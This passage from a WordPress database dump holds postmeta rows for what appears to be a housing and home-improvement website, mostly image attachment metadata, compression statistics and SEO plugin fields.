WP-Optimize'),(370,20,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:357452;s:12:\"smushed-size\";i:338428;s:15:\"savings-percent\";d:5.3200000000000003;}'),(371,17,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/kitchen-updraft-pre-smush-original.jpg'),(372,17,'smush-complete','1'),(373,17,'smush-info','The file was compressed from 178.71 KB to 174.40 KB saving 2.41 percent using WP-Optimize'),(374,17,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:183003;s:12:\"smushed-size\";i:178586;s:15:\"savings-percent\";d:2.4100000000000001;}'),(375,13,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/interior-design-updraft-pre-smush-original.jpg'),(376,13,'smush-complete','1'),(377,13,'smush-info','The file was compressed from 114.71 KB to 111.43 KB saving 2.86 percent using WP-Optimize'),(378,13,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:117462;s:12:\"smushed-size\";i:114101;s:15:\"savings-percent\";d:2.8599999999999999;}'),(379,11,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/lost-places-updraft-pre-smush-original.jpg'),(380,11,'smush-complete','1'),(381,11,'smush-info','The file was compressed from 392.82 KB to 370.29 KB saving 5.74 percent using WP-Optimize'),(382,11,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:402246;s:12:\"smushed-size\";i:379172;s:15:\"savings-percent\";d:5.7400000000000002;}'),(383,10,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/home-updraft-pre-smush-original.jpg'),(384,10,'smush-complete','1'),(385,10,'smush-info','The file was compressed from 267.99 KB to 251.75 KB saving 6.06 percent using WP-Optimize'),(386,10,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:274421;s:12:\"smushed-size\";i:257793;s:15:\"savings-percent\";d:6.0599999999999996;}'),(387,135,'_edit_last','1'),(388,135,'_edit_lock','1629466155:1'),(389,135,'_yoast_wpseo_content_score','60'),(390,135,'_yoast_wpseo_primary_category',''),(391,140,'_wp_attached_file','2019/08/nature-3336524_960_720.jpg'),(392,140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:34:\"2019/08/nature-3336524_960_720.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"nature-3336524_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"nature-3336524_960_720-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"nature-3336524_960_720-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"nature-3336524_960_720-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:34:\"nature-3336524_960_720-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DMC-FZ1000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"34.91\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:8:\"0.000125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(393,135,'_thumbnail_id','140'),(394,135,'wpmdr_menu','1'),(395,140,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/nature-3336524_960_720-updraft-pre-smush-original.jpg'),(396,140,'smush-complete','1'),(397,140,'smush-info','The file was compressed from 211.95 KB to 198.02 KB saving 6.57 percent using WP-Optimize'),(398,140,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:217040;s:12:\"smushed-size\";i:202776;s:15:\"savings-percent\";d:6.5700000000000003;}'),(399,150,'_wp_attached_file','2019/08/thai-property.jpg'),(400,150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:532;s:4:\"file\";s:25:\"2019/08/thai-property.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"thai-property-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"thai-property-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"thai-property-768x426.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"thai-property-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:25:\"thai-property-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(401,150,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/thai-property-updraft-pre-smush-original.jpg'),(402,150,'smush-complete','1'),(403,150,'smush-info','The file was compressed from 112.21 KB to 109.04 KB saving 2.83 percent using WP-Optimize'),(404,150,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:114900;s:12:\"smushed-size\";i:111654;s:15:\"savings-percent\";d:2.8300000000000001;}'),(408,158,'_edit_last','1'),(409,158,'_edit_lock','1599490318:1'),(410,159,'_wp_attached_file','2019/08/homeimprovements.jpg'),(411,159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2019/08/homeimprovements.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"homeimprovements-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"homeimprovements-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"homeimprovements-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"homeimprovements-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:28:\"homeimprovements-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(412,159,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/homeimprovements-updraft-pre-smush-original.jpg'),(413,159,'smush-complete','1'),(414,159,'smush-info','The file was compressed from 72.94 KB to 72.04 KB saving 1.24 percent using WP-Optimize'),(415,159,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:74695;s:12:\"smushed-size\";i:73772;s:15:\"savings-percent\";d:1.24;}'),(416,158,'_thumbnail_id','171'),(417,158,'_yoast_wpseo_content_score','30'),(418,158,'_yoast_wpseo_primary_category','10'),(419,158,'wpmdr_menu','1'),(420,164,'_wp_attached_file','2019/08/electrician.jpg'),(421,164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:23:\"2019/08/electrician.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"electrician-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"electrician-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"electrician-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"electrician-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:23:\"electrician-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(422,164,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/electrician-updraft-pre-smush-original.jpg'),(423,164,'smush-complete','1'),(424,164,'smush-info','The file was compressed from 162.07 KB to 156.20 KB saving 3.62 percent using WP-Optimize'),(425,164,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:165956;s:12:\"smushed-size\";i:159948;s:15:\"savings-percent\";d:3.6200000000000001;}'),(428,171,'_wp_attached_file','2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg'),(429,171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:73:\"2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:73:\"IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:73:\"IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:73:\"IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:73:\"IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:73:\"IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(430,171,'_wp_attachment_image_alt','IS AN ELECTRICAL CERTIFICATE NECESSARY WHEN SELLING YOUR HOME?'),(433,171,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-updraft-pre-smush-original.jpg'),(434,171,'smush-complete','1'),(435,171,'smush-info','The file was compressed from 136.41 KB to 130.38 KB saving 4.42 percent using WP-Optimize'),(436,171,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:139682;s:12:\"smushed-size\";i:133504;s:15:\"savings-percent\";d:4.4199999999999999;}'),(437,180,'_edit_last','1'),(438,180,'_edit_lock','1568370025:1'),(440,180,'_yoast_wpseo_content_score','30'),(441,180,'_yoast_wpseo_primary_category','11'),(442,180,'wpmdr_menu','1'),(446,186,'_wp_attached_file','2019/09/cleaning-3977589_960_720.jpg'),(447,186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:36:\"2019/09/cleaning-3977589_960_720.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"cleaning-3977589_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"cleaning-3977589_960_720-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"cleaning-3977589_960_720-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"cleaning-3977589_960_720-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:36:\"cleaning-3977589_960_720-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(448,186,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/09/cleaning-3977589_960_720-updraft-pre-smush-original.jpg'),(449,186,'smush-complete','1'),(450,186,'smush-info','The file was compressed from 134.92 KB to 130.06 KB saving 3.6 percent using WP-Optimize'),(451,186,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:138159;s:12:\"smushed-size\";i:133186;s:15:\"savings-percent\";d:3.6000000000000001;}'),(452,209,'_edit_last','1'),(453,209,'_edit_lock','1569312339:1'),(454,210,'_wp_attached_file','2019/09/gardening.jpg'),(455,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:669;s:4:\"file\";s:21:\"2019/09/gardening.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"gardening-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"gardening-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"gardening-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"gardening-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:21:\"gardening-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(456,211,'_wp_attached_file','2019/09/garden-waste.jpg'),(457,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:24:\"2019/09/garden-waste.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"garden-waste-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"garden-waste-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"garden-waste-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"garden-waste-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:24:\"garden-waste-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(458,212,'_wp_attached_file','2019/09/tree-surgeon.jpg'),(459,212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:540;s:6:\"height\";i:720;s:4:\"file\";s:24:\"2019/09/tree-surgeon.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tree-surgeon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tree-surgeon-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"tree-surgeon-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:24:\"tree-surgeon-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"SZ-14\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"33.2\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(460,213,'_wp_attached_file','2019/09/planning-permission-garden.jpg'),(461,213,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:38:\"2019/09/planning-permission-garden.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"planning-permission-garden-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"planning-permission-garden-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"planning-permission-garden-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:38:\"planning-permission-garden-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:38:\"planning-permission-garden-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"DSC-QX100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.4\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(462,214,'_wp_attached_file','2019/09/garden-1680802_960_720.jpg'),(463,214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:34:\"2019/09/garden-1680802_960_720.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"garden-1680802_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"garden-1680802_960_720-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"garden-1680802_960_720-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"garden-1680802_960_720-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:34:\"garden-1680802_960_720-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D90\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(464,215,'_wp_attached_file','2019/09/garden.jpg'),(465,215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:18:\"2019/09/garden.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"garden-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"garden-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"garden-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"garden-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:18:\"garden-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(466,216,'_wp_attached_file','2019/09/water-sustainability.jpg'),(467,216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:627;s:4:\"file\";s:32:\"2019/09/water-sustainability.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"water-sustainability-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"water-sustainability-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"water-sustainability-768x502.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"water-sustainability-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:32:\"water-sustainability-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCA-77M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(468,209,'_thumbnail_id','215'),(